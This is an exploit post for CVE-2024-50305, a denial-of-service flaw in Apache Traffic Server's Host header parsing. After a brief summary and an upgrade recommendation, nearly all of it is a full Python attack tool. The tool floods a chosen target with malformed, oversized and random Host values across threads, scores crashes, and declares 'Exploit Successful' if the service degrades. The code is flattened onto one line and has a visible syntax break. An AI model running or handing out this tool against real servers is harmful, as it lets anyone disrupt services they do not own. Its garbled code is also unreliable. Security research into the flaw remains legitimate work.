=============================================================================================================================================
| # Title     : Apache Traffic Server Host Header Denial of Service Vulnerability
| # Author    : indoushka
| # Tested on : Windows 11 Fr (Pro) / Browser: Mozilla Firefox 147.0.3 (64-bit)
| # Vendor    : https://trafficserver.apache.org/
=============================================================================================================================================

[+] Summary : CVE-2024-50305 is a denial-of-service (DoS) vulnerability in Apache Traffic Server caused by improper handling and validation of malformed or unexpected Host header values in incoming HTTP requests. An attacker can send specially crafted requests whose Host header is abnormal, oversized, or non-standard. Under certain conditions this can lead to service instability, excessive resource consumption, unexpected connection termination, or a process crash, resulting in a temporary denial of service. The root cause is insufficient input validation in the HTTP request parsing logic. Per the vendor advisory, Apache Traffic Server 9.2.0 through 9.2.5 is affected; upgrading to 9.2.6 or later is the primary remediation.
Proper boundary checks, strict header validation, and adherence to RFC standards are recommended to mitigate the risk [+] POC : #!/usr/bin/env python3 import socket import sys import time import argparse import threading import ssl import ipaddress import random import string from concurrent.futures import ThreadPoolExecutor, as_completed from typing import List, Tuple, Optional, Dict, Any from enum import Enum from dataclasses import dataclass, field from contextlib import contextmanager import logging from collections import Counter logging.basicConfig( level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt='%H:%M:%S' ) logger = logging.getLogger('cve_2024_50305') class ServiceState(Enum): """Possible service states""" UP = "up" DOWN = "down" UNKNOWN = "unknown" FILTERED = "filtered" SLOW = "slow" ERROR = "error" class Protocol(Enum): """Connection protocol""" HTTP1 = "http/1.1" HTTP2 = "http/2" UNKNOWN = "unknown" class CrashConfidence(Enum): """Confidence level in crash detection""" HIGH = "high" MEDIUM = "medium" LOW = "low" NONE = "none" @dataclass class RequestResult: """Result of a single request""" payload: str response_time: float status_code: Optional[int] = None crash_confidence: CrashConfidence = CrashConfidence.NONE error: Optional[str] = None timeout_occurred: bool = False bytes_received: int = 0 connection_reset: bool = False @dataclass class Statistics: """Attack statistics - optimized to avoid memory growth""" total_requests: int = 0 crashes_high: int = 0 crashes_medium: int = 0 crashes_low: int = 0 timeouts: int = 0 connection_refused: int = 0 connection_reset: int = 0 successful: int = 0 errors: int = 0 status_codes: Counter = field(default_factory=Counter) # Response time stats - stored compactly response_time_sum: float = 0.0 response_time_count: int = 0 response_time_min: float = float('inf') response_time_max: float = 0.0 class HTTPResponseParser: """HTTP response parser""" @staticmethod def 
parse_status_line(data: bytes) -> Tuple[Optional[int], Optional[Protocol]]: """ Parses the first status line of an HTTP response """ if not data: return None, None end_of_line = data.find(b'\r\n') if end_of_line == -1: return None, None first_line = data[:end_of_line].decode('ascii', errors='ignore') parts = first_line.split(' ') if len(parts) < 2: return None, None protocol = Protocol.UNKNOWN if parts[0].startswith('HTTP/1'): protocol = Protocol.HTTP1 elif parts[0].startswith('HTTP/2'): protocol = Protocol.HTTP2 try: status_code = int(parts[1]) return status_code, protocol except (ValueError, IndexError): return None, protocol class TargetResolver: """Resolves target addresses with IPv4/IPv6 support""" def __init__(self, prefer_ipv6: bool = False): self.prefer_ipv6 = prefer_ipv6 self._cache = {} def _is_ip_address(self, target: str) -> Tuple[bool, Optional[int]]: """ Checks if the text is an IP address and returns its family Returns: (is_ip, family) """ try: ip_obj = ipaddress.ip_address(target) if ip_obj.version == 6: return True, socket.AF_INET6 else: return True, socket.AF_INET except ValueError: return False, None def resolve(self, target: str, port: int) -> Optional[Tuple[str, int, int]]: """ Resolves target to (ip, port, family) Returns: (ip, port, socket_family) or None on failure """ cache_key = f"{target}:{port}:{self.prefer_ipv6}" if cache_key in self._cache: return self._cache[cache_key] is_ip, ip_family = self._is_ip_address(target) if is_ip: result = (target, port, ip_family) self._cache[cache_key] = result return result if self.prefer_ipv6: families = [socket.AF_INET6, socket.AF_INET] else: families = [socket.AF_INET, socket.AF_INET6] for family in families: try: addrinfo = socket.getaddrinfo( target, port, family=family, type=socket.SOCK_STREAM, proto=socket.IPPROTO_TCP ) if addrinfo: _, _, _, _, sockaddr = addrinfo[0] if family == socket.AF_INET6: ip, port, flowinfo, scopeid = sockaddr else: ip, port = sockaddr result = (ip, port, family) 
self._cache[cache_key] = result logger.debug(f"Resolved {target} -> {ip} ({'IPv6' if family == socket.AF_INET6 else 'IPv4'})") return result except socket.gaierror: continue except Exception as e: logger.debug(f"Error resolving {target} using family {family}: {e}") continue logger.error(f"Failed to resolve {target}") return None class ServiceChecker: """Accurate service status checker""" def __init__(self, timeout: float = 5, max_header_size: int = 8192): self.timeout = timeout self.max_header_size = max_header_size @contextmanager def _create_socket(self, family: int, use_ssl: bool = False, hostname: str = None): """Creates a socket with SSL support""" sock = socket.socket(family, socket.SOCK_STREAM) sock.settimeout(self.timeout) try: if use_ssl: context = ssl.create_default_context() context.check_hostname = False context.verify_mode = ssl.CERT_NONE is_ip = False if hostname: try: ipaddress.ip_address(hostname) is_ip = True except ValueError: pass server_hostname = hostname if hostname and not is_ip else None sock = context.wrap_socket(sock, server_hostname=server_hostname) yield sock finally: try: sock.close() except: pass def _is_valid_http_response(self, data: bytes) -> Tuple[bool, Optional[int]]: """Checks validity of HTTP response and extracts status code""" status_code, _ = HTTPResponseParser.parse_status_line(data) return status_code is not None, status_code def check(self, ip: str, port: int, family: int, hostname: str = None, use_ssl: bool = False) -> Tuple[ServiceState, float, Optional[int]]: """ Performs a detailed service check Returns: (State, Response Time, Status Code) """ start_time = time.monotonic() try: with self._create_socket(family, use_ssl, hostname or ip) as sock: host_header = hostname or ip if family == socket.AF_INET6 and ':' in ip and not ip.startswith('['): host_header = f"[{ip}]" request = ( f"GET / HTTP/1.1\r\n" f"Host: {host_header}\r\n" f"User-Agent: CVE-2024-50305-Checker/1.0\r\n" f"Accept: text/html,application/xhtml+xml\r\n" 
f"Accept-Language: en-US,en;q=0.9\r\n" f"Connection: close\r\n" f"\r\n" ).encode() if family == socket.AF_INET6: sock.connect((ip, port, 0, 0)) else: sock.connect((ip, port)) sock.sendall(request) response = b"" while True: try: chunk = sock.recv(self.max_header_size) if not chunk: break response += chunk if b'\r\n\r\n' in response: break if len(response) > self.max_header_size: break except socket.timeout: break response_time = time.monotonic() - start_time is_valid, status_code = self._is_valid_http_response(response) if is_valid and status_code is not None: if 200 <= status_code < 600: return ServiceState.UP, response_time, status_code else: return ServiceState.UP, response_time, status_code elif response: return ServiceState.UNKNOWN, response_time, None else: return ServiceState.UNKNOWN, response_time, None except socket.timeout: return ServiceState.SLOW, self.timeout, None except ConnectionRefusedError: return ServiceState.DOWN, 0, None except ConnectionResetError: return ServiceState.UNKNOWN, time.monotonic() - start_time, None except socket.gaierror: return ServiceState.ERROR, 0, None except Exception as e: logger.debug(f"Check Error: {e}") return ServiceState.ERROR, 0, None class RequestSender: """Sends malicious requests with detailed result analysis""" def __init__(self, timeout: float = 5, max_response_size: int = 4096): self.timeout = timeout self.max_response_size = max_response_size @contextmanager def _create_socket(self, family: int): """Creates a socket""" sock = socket.socket(family, socket.SOCK_STREAM) sock.settimeout(self.timeout) try: yield sock finally: try: sock.close() except: pass def _evaluate_crash_confidence(self, result: RequestResult, normal_behavior: Dict) -> CrashConfidence: """ Evaluates crash detection confidence based on several factors """ if result.connection_reset: return CrashConfidence.HIGH if result.timeout_occurred and result.bytes_received == 0: return CrashConfidence.MEDIUM if result.bytes_received == 0 and not 
result.error: return CrashConfidence.LOW return CrashConfidence.NONE def send(self, ip: str, port: int, family: int, host_payload: str, baseline_time: float = 1.0) -> RequestResult: """ Sends a malicious request with accurate result analysis Args: baseline_time: Normal service response time """ result = RequestResult(payload=host_payload, response_time=0.0) start_time = time.monotonic() try: with self._create_socket(family) as sock: try: if family == socket.AF_INET6: sock.connect((ip, port, 0, 0)) else: sock.connect((ip, port)) except ConnectionRefusedError: result.error = "connection_refused" result.response_time = time.monotonic() - start_time return result try: encoded_host = host_payload.encode('utf-8') except UnicodeEncodeError: encoded_host = host_payload.encode('ascii', errors='replace') request = ( b"GET / HTTP/1.1\r\n" b"Host: " + encoded_host + b"\r\n" b"User-Agent: CVE-2024-50305/1.0\r\n" b"Accept: */*\r\n" b"Connection: close\r\n" b"\r\n" ) try: sock.sendall(request) except ConnectionResetError: result.connection_reset = True result.response_time = time.monotonic() - start_time result.crash_confidence = CrashConfidence.HIGH return result except BrokenPipeError: result.connection_reset = True result.response_time = time.monotonic() - start_time result.crash_confidence = CrashConfidence.HIGH response = b"" try: while True: try: chunk = sock.recv(4096) if not chunk: break response += chunk if len(response) > self.max_response_size: break except socket.timeout: result.timeout_occurred = True break except ConnectionResetError: result.connection_reset = True result.crash_confidence = CrashConfidence.HIGH result.response_time = time.monotonic() - start_time result.bytes_received = len(response) if response: status_code, _ = HTTPResponseParser.parse_status_line(response) result.status_code = status_code if status_code is not None: result.crash_confidence = CrashConfidence.NONE else: result.crash_confidence = CrashConfidence.LOW if result.crash_confidence == 
CrashConfidence.NONE: result.crash_confidence = self._evaluate_crash_confidence(result, {}) except Exception as e: result.error = str(e) result.response_time = time.monotonic() - start_time return result class PayloadGenerator: """Generates malicious Host values""" BASE_PAYLOADS = [ ":", "::", "[::1]", "", "\0", "localhost:8080:extra", "host\x00injection", ] SPECIAL_CHARS = list(string.punctuation + string.whitespace) @classmethod def generate(cls, count: int = 30) -> List[str]: """Generates a list of payloads""" count = max(10, min(count, 100)) payloads = set(cls.BASE_PAYLOADS) for length in [100, 500, 1000, 2000, 5000]: if len(payloads) < count: payloads.add('A' * length) payloads.add('B' * length) random_needed = count - len(payloads) if random_needed > 0: for _ in range(random_needed): length = random.randint(5, 50) random_payload = ''.join(random.choices(cls.SPECIAL_CHARS, k=length)) payloads.add(random_payload) unicode_samples = ["🚀", "测试", "αβγ", "★", "🌍"] payloads.update(unicode_samples[:max(0, count - len(payloads))]) return list(payloads)[:count] class StatisticsCollector: """Thread-safe statistics collection with memory control""" def __init__(self, max_response_times: int = 1000): self.lock = threading.Lock() self.stats = Statistics() self.max_response_times = max_response_times self._response_times_sample = [] # Limited sample for analysis def add_result(self, result: RequestResult): """Adds a result in a thread-safe manner""" with self.lock: self.stats.total_requests += 1 if result.crash_confidence == CrashConfidence.HIGH: self.stats.crashes_high += 1 elif result.crash_confidence == CrashConfidence.MEDIUM: self.stats.crashes_medium += 1 elif result.crash_confidence == CrashConfidence.LOW: self.stats.crashes_low += 1 if result.error == "connection_refused": self.stats.connection_refused += 1 elif result.connection_reset: self.stats.connection_reset += 1 elif result.error: self.stats.errors += 1 if result.timeout_occurred: self.stats.timeouts += 1 if 
result.status_code is not None: self.stats.successful += 1 self.stats.status_codes[result.status_code] += 1 if result.response_time > 0: self.stats.response_time_sum += result.response_time self.stats.response_time_count += 1 self.stats.response_time_min = min(self.stats.response_time_min, result.response_time) self.stats.response_time_max = max(self.stats.response_time_max, result.response_time) if len(self._response_times_sample) < self.max_response_times: self._response_times_sample.append(result.response_time) def get_stats(self) -> Statistics: """Gets a copy of the statistics""" with self.lock: stats_copy = Statistics( total_requests=self.stats.total_requests, crashes_high=self.stats.crashes_high, crashes_medium=self.stats.crashes_medium, crashes_low=self.stats.crashes_low, timeouts=self.stats.timeouts, connection_refused=self.stats.connection_refused, connection_reset=self.stats.connection_reset, successful=self.stats.successful, errors=self.stats.errors, status_codes=self.stats.status_codes.copy(), response_time_sum=self.stats.response_time_sum, response_time_count=self.stats.response_time_count, response_time_min=self.stats.response_time_min, response_time_max=self.stats.response_time_max ) return stats_copy def get_average_response_time(self) -> float: """Calculates average response time""" if self.stats.response_time_count > 0: return self.stats.response_time_sum / self.stats.response_time_count return 0.0 class CVE202450305Exploit: """Main exploit class""" def __init__(self, target: str, port: int = 80, threads: int = 5, timeout: float = 5, prefer_ipv6: bool = False, use_ssl: bool = False, rate_limit: float = 0.1): if not 1 <= port <= 65535: raise ValueError(f"Invalid port number: {port}") if threads < 1 or threads > 100: raise ValueError(f"Thread count must be between 1 and 100") self.target = target self.port = port self.threads = threads self.timeout = timeout self.prefer_ipv6 = prefer_ipv6 self.use_ssl = use_ssl self.rate_limit = rate_limit 
self.resolver = TargetResolver(prefer_ipv6) self.checker = ServiceChecker(timeout) self.sender = RequestSender(timeout) self.stats = StatisticsCollector() self.target_ip = None self.target_family = None self.baseline_state = ServiceState.UNKNOWN self.baseline_time = 1.0 # Default value self.baseline_status = None self.is_ip_target = False def initialize(self) -> bool: """Initializes exploit and resolves target""" logger.info(f"Initializing exploit for target {self.target}:{self.port}") resolved = self.resolver.resolve(self.target, self.port) if not resolved: logger.error("Failed to resolve target") return False self.target_ip, _, self.target_family = resolved try: ipaddress.ip_address(self.target) self.is_ip_target = True except ValueError: self.is_ip_target = False logger.info(f"Target resolved: {self.target_ip} " f"({'IPv6' if self.target_family == socket.AF_INET6 else 'IPv4'})") logger.info("Performing baseline service check...") state, resp_time, status = self.checker.check( self.target_ip, self.port, self.target_family, hostname=self.target if not self.is_ip_target else None, use_ssl=self.use_ssl ) self.baseline_state = state if resp_time > 0: self.baseline_time = resp_time self.baseline_status = status if state == ServiceState.UP: logger.info(f" Service is UP (Code: {status}, Time: {resp_time:.3f}s)") return True elif state == ServiceState.SLOW: logger.warning(f" Service is SLOW (Time: {resp_time:.3f}s)") return True elif state == ServiceState.UNKNOWN: logger.warning(f" Service status is UNKNOWN") return True else: logger.error(f" Service is NOT running: {state.value}") return False def _process_payload_chunk(self, payloads: List[str], iteration: int, chunk_idx: int) -> List[RequestResult]: """Processes a subset of payloads""" results = [] with ThreadPoolExecutor(max_workers=self.threads) as executor: future_to_payload = {} for payload in payloads: if self.rate_limit > 0: time.sleep(self.rate_limit) future = executor.submit( self.sender.send, self.target_ip, 
self.port, self.target_family, payload, self.baseline_time ) future_to_payload[future] = payload for future in as_completed(future_to_payload): try: result = future.result(timeout=self.timeout + 2) results.append(result) self.stats.add_result(result) if result.crash_confidence == CrashConfidence.HIGH: logger.info(f" HIGH confidence crash: {repr(result.payload)[:50]}...") elif result.crash_confidence == CrashConfidence.MEDIUM: logger.debug(f" MEDIUM confidence: {repr(result.payload)[:50]}...") elif result.connection_reset: logger.debug(f" Connection reset: {repr(result.payload)[:50]}...") elif result.timeout_occurred: logger.debug(f" Timeout: {repr(result.payload)[:50]}...") except Exception as e: logger.error(f"Error processing result: {e}") return results def run(self, payload_count: int = 30, iterations: int = 3) -> Tuple[bool, Statistics]: """ Executes the attack Returns: (Exploit_Success, Statistics) """ logger.info("=" * 60) logger.info(" CVE-2024-50305 - Apache Traffic Server DoS Exploit") logger.info("=" * 60) logger.info(f"Target: {self.target} ({self.target_ip}:{self.port})") logger.info(f"Protocol: {'HTTPS' if self.use_ssl else 'HTTP'}") logger.info(f"Threads: {self.threads}, Timeout: {self.timeout}s") logger.info(f"Rate limit: {self.rate_limit}s") logger.info(f"Payloads: {payload_count}, Iterations: {iterations}") logger.info("=" * 60) payloads = PayloadGenerator.generate(payload_count) logger.info(f" Generated {len(payloads)} malicious Host values") all_results = [] for iteration in range(iterations): logger.info(f"\n Iteration {iteration + 1}/{iterations}") chunk_size = max(1, len(payloads) chunks = [payloads[i:i+chunk_size] for i in range(0, len(payloads), chunk_size)] for chunk_idx, chunk in enumerate(chunks): logger.debug(f" Processing chunk {chunk_idx + 1}/{len(chunks)}") results = self._process_payload_chunk(chunk, iteration, chunk_idx) all_results.extend(results) stats = self.stats.get_stats() logger.info(f" Progress: 
{stats.total_requests}/{iterations * len(payloads)} " f"(High: {stats.crashes_high}, Med: {stats.crashes_medium})") if chunk_idx < len(chunks) - 1: time.sleep(1) final_stats = self.stats.get_stats() avg_time = self.stats.get_average_response_time() logger.info("\n" + "=" * 60) logger.info(" Final Statistics:") logger.info(f" Total Requests: {final_stats.total_requests}") logger.info(f" HIGH confidence crashes: {final_stats.crashes_high}") logger.info(f" MEDIUM confidence crashes: {final_stats.crashes_medium}") logger.info(f" LOW confidence crashes: {final_stats.crashes_low}") logger.info(f" Timeouts: {final_stats.timeouts}") logger.info(f" Connection resets: {final_stats.connection_reset}") logger.info(f" Connection refused: {final_stats.connection_refused}") logger.info(f" Successful responses: {final_stats.successful}") if final_stats.status_codes: logger.info(f" Status Codes: {dict(final_stats.status_codes)}") if final_stats.response_time_count > 0: logger.info(f" Response Time - Avg: {avg_time:.3f}s") logger.info(f" Response Time - Min: {final_stats.response_time_min:.3f}s") logger.info(f" Response Time - Max: {final_stats.response_time_max:.3f}s") logger.info("=" * 60) logger.info("\n Verifying exploit success...") time.sleep(3) post_state, post_time, post_status = self.checker.check( self.target_ip, self.port, self.target_family, hostname=self.target if not self.is_ip_target else None, use_ssl=self.use_ssl ) success = False reasons = [] if final_stats.crashes_high > 0: reasons.append(f"Detected {final_stats.crashes_high} HIGH confidence crashes") success = True if final_stats.crashes_medium > 3: reasons.append(f"Detected {final_stats.crashes_medium} MEDIUM confidence crashes") success = True if self.baseline_state == ServiceState.UP: if post_state == ServiceState.DOWN: reasons.append("Service stopped after attack") success = True elif post_state == ServiceState.SLOW and self.baseline_time > 0: slowdown_ratio = post_time / self.baseline_time if slowdown_ratio 
> 3: reasons.append(f"Significant service slowdown ({slowdown_ratio:.1f}x)") success = True if success: logger.info("Exploit Successful!") for reason in reasons: logger.info(f" • {reason}") return True, final_stats else: logger.info(" Exploit Failed") if reasons: logger.info(f" ({', '.join(reasons)})") else: logger.info(" No evidence of vulnerability found") return False, final_stats def main(): """Main function""" parser = argparse.ArgumentParser( description="CVE-2024-50305 - Apache Traffic Server DoS Exploit", formatter_class=argparse.RawDescriptionHelpFormatter ) parser.add_argument("target", help="Target address (IP or domain)") parser.add_argument("-p", "--port", type=int, default=80, help="Target port (1-65535, default: 80)") parser.add_argument("-t", "--threads", type=int, default=5, help="Thread count (1-100, default: 5)") parser.add_argument("--timeout", type=float, default=5, help="Connection timeout in seconds (default: 5)") parser.add_argument("--ipv6", action="store_true", help="Prefer IPv6") parser.add_argument("--ssl", action="store_true", help="Use HTTPS/SSL") parser.add_argument("--rate-limit", type=float, default=0.05, help="Delay between requests in seconds (default: 0.05)") parser.add_argument("-c", "--payloads", type=int, default=30, help="Number of payloads to test (10-100, default: 30)") parser.add_argument("-i", "--iterations", type=int, default=3, help="Number of iterations (default: 3)") parser.add_argument("-v", "--verbose", action="store_true", help="Show detailed information") args = parser.parse_args() if args.verbose: logger.setLevel(logging.DEBUG) try: exploit = CVE202450305Exploit( target=args.target, port=args.port, threads=args.threads, timeout=args.timeout, prefer_ipv6=args.ipv6, use_ssl=args.ssl, rate_limit=args.rate_limit ) if not exploit.initialize(): sys.exit(2) success, stats = exploit.run( payload_count=args.payloads, iterations=args.iterations ) sys.exit(0 if success else 1) except KeyboardInterrupt: logger.info("\nAttack 
stopped by user") sys.exit(2) except ValueError as e: logger.error(f"Input Error: {e}") sys.exit(2) except Exception as e: logger.error(f"Unexpected Error: {e}") if args.verbose: import traceback traceback.print_exc() sys.exit(2) if __name__ == "__main__": main() Greetings to :====================================================================== jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)| ====================================================================================